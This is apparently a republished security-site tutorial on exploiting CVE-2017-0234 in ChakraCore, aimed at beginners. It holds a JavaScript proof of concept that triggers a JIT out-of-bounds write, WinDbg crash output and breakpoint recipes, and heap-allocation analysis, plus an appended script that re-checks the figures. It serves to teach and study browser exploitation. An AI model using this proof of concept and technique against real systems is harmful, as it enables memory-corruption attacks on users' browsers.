Source: myhack58 (MYHACK58:62201993505)
History: Apr 04, 2019 - 12:00 a.m.

Edge exploitation with no prior knowledge - Vulnerability Warning - Heiba Security Net (myhack58)

2019-04-04 00:00:00
Author: Anonymous (佚名)
www.myhack58.com

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 7.6 High
Access Vector: NETWORK
Access Complexity: HIGH
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C

EPSS: 0.193 Low
Percentile: 95.8%

Background
Since Pwn2Own began in 2007, the browser has always been the main event. Watching the contest, I believe many readers have been eager to try it themselves. But how many times have you started full of confidence, only to shelve the attempt in the end? This article is written for readers with no prior knowledge of browser exploitation: the author walks through the exploitation process in detail, pointing out the pitfalls along the way and summarising the techniques. The aim is to resolve some common pain points and, at the same time, restore our confidence in exploitation; after all, as someone once said, confidence is more precious than gold.

Goal of this article
Watching the experts' virtuoso performances and not knowing where to start? Seeing it a thousand times is worth less than doing it once. After all, seeing is believing, and doing it yourself is more fun. Let's get hands-on and, starting from zero, reliably pop our first calculator from the browser!

Hands-on practice
We take CVE-2017-0234 as the example; the ch (ChakraCore shell) version is 1.4.3. The PoC file is as follows:
function jitBlock(arr, index)
{
    arr[index] = 0xdeedbeef;
}
var arr = new Uint32Array(0x40000/4)
// warm the function up so the JIT compiles it
for(var i=0; i<0x10000; i++){
    jitBlock(arr, 0)
}
// call the JIT-compiled code with an out-of-bounds index
jitBlock(arr, 0x7fffffff)
Running the PoC under WinDbg produces the following crash:
Comparing the JS file with the disassembly, we can easily see that the rbx register holds the typed array's buffer and r14 holds the array index. Root cause: the JIT over-optimises the generated code, which leads to an out-of-bounds array access.

Background knowledge
So far we only know that this bug gives us an out-of-bounds write. How do we turn that into something usable? To answer this, a few fundamental questions have to be settled first:
1. Which allocator does the vulnerable object come from: VirtualAlloc, malloc, HeapAlloc, or MemGC?
2. Can the allocation size be arbitrary?
3. Because of memory alignment, how much space does the vulnerable object actually occupy?
We resolve these one by one.
1. Which allocator does the vulnerable object come from: VirtualAlloc, malloc, HeapAlloc, or MemGC?
The answer to this question decides which kind of object we can use to occupy the region reached by the out-of-bounds write.
First, wildcard-search the process for the alloc-related APIs:
> x kernel32!virtual*
00007ff8fc40b0d0 KERNEL32!VirtualQueryStub (<no parameter info>)
00007ff8fc40a2a0 KERNEL32!VirtualAllocStub (<no parameter info>)
00007ff8fc4273e0 KERNEL32!VirtualProtectExStub (<no parameter info>)
00007ff8fc40b0b0 KERNEL32!VirtualProtectStub (<no parameter info>)
00007ff8fc40ba70 KERNEL32!VirtualUnlockStub (<no parameter info>)
00007ff8fc4105b0 KERNEL32!VirtualAllocExNumaStub (<no parameter info>)
00007ff8fc40a2c0 KERNEL32!VirtualFreeStub (<no parameter info>)
00007ff8fc4273c0 KERNEL32!VirtualAllocExStub (<no parameter info>)
00007ff8fc40b0a0 KERNEL32!VirtualQueryExStub (<no parameter info>)
00007ff8fc4273d0 KERNEL32!VirtualFreeExStub (<no parameter info>)
00007ff8fc40ed20 KERNEL32!VirtualLockStub (<no parameter info>)
Then print the key API's parameters and return value with conditional breakpoints (the size argument arrives in rdx, the return value in rax):
> bu KERNELBASE!VirtualAlloc ".if(@rdx>=0x40000){.printf \"addr=%p size=%p\\n\",rcx,rdx;gc}.else{gc}"
> bu KERNELBASE!VirtualAlloc+0x5a ".if(1==2){}.else{.printf \"ret=%p\\n\",rax;gc}"
Re-run the PoC and you can confirm that the arr buffer is indeed allocated by VirtualAlloc. There are two related allocation records: the returned address is the same but the sizes differ. Interested readers can go on to print VirtualAlloc's other parameters as well. Why the same address is returned for two allocations is a question we will clear up together with the others later; for now we concentrate on the exploit itself.
2. Can the allocation size be arbitrary?
To improve the exploit's success rate, the vulnerability must first reproduce reliably. We state the conclusion here and leave the reasoning for later.
> bu chakracore!Js::JavascriptArrayBuffer::IsValidVirtualBufferLength
/*
1. length >= 2^16
2. length is a power of 2, or (length > 2^24 and length is a multiple of 2^24)
3. length is a multiple of 4K
*/
A buffer is allocated along this path only when its length satisfies all of the conditions above, so len >= 2^(16+n) or len > 2^(24+n), where n is a non-negative integer. The smallest len that meets the conditions is therefore 2^16 = 0x10000.
3. Because of memory alignment, how much space does the vulnerable object actually occupy?
WinDbg's !address command answers this:
000001c321cc00d2 42893cab mov dword ptr [rbx+r13*4],edi ds:000001c221c9fffc=????????
0:003> !address rbx
Usage:
Base Address: 000001c021ca0000
End Address: 000001c021cb0000
Region Size: 0000000000010000 ( 64.000 kB)
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
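The two numeric claims above (the minimum length accepted by IsValidVirtualBufferLength and the faulting address in the crash) can be checked with a small script. This is an added example, not code from the article or from ChakraCore; the function names, the re-implementation of the three quoted conditions and the generalised search for the smallest valid length are my own, and the base address and index are taken from the WinDbg output above.

```javascript
// Added example: re-implements the three conditions the article quotes from
// Js::JavascriptArrayBuffer::IsValidVirtualBufferLength (an approximation of
// that check, not ChakraCore's own code) and re-derives the crash address.
const PAGE_4K = 0x1000;
const TWO_16 = 0x10000;
const TWO_24 = 0x1000000;

function isPowerOfTwo(n) {
  // BigInt avoids the 32-bit truncation of JS bitwise operators
  const b = BigInt(n);
  return b > 0n && (b & (b - 1n)) === 0n;
}

// Rule set quoted on the page:
//  1. length >= 2^16
//  2. length is a power of two, or (length > 2^24 and a multiple of 2^24)
//  3. length is a multiple of 4 KB
function isValidVirtualBufferLength(length) {
  if (!Number.isInteger(length) || length < TWO_16) return false;
  const rule2 = isPowerOfTwo(length) || (length > TWO_24 && length % TWO_24 === 0);
  const rule3 = length % PAGE_4K === 0;
  return rule2 && rule3;
}

// Smallest page-multiple length that passes all three rules (page says 0x10000).
function smallestValidLength() {
  let len = PAGE_4K;
  while (!isValidVirtualBufferLength(len)) len += PAGE_4K;
  return len;
}

// Out-of-bounds Uint32Array store at element `index` lands at base + index*4.
// Values below 2^53 so plain Numbers stay exact.
function faultAddress(base, index, elemSize = 4) {
  return base + index * elemSize;
}

// Constructed check against the figures on the page.
const POC_BYTES = 0x40000;          // new Uint32Array(0x40000/4)
const BUFFER_BASE = 0x1c021ca0000;  // rbx from the !address output
const OOB_INDEX = 0x7fffffff;       // index passed to jitBlock
console.log(isValidVirtualBufferLength(POC_BYTES));              // true
console.log(smallestValidLength().toString(16));                 // "10000"
console.log(faultAddress(BUFFER_BASE, OOB_INDEX).toString(16));  // "1c221c9fffc"
```

The last value matches the ds: address in the faulting mov, confirming that rbx is the buffer base and the index is scaled by the 4-byte element size.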

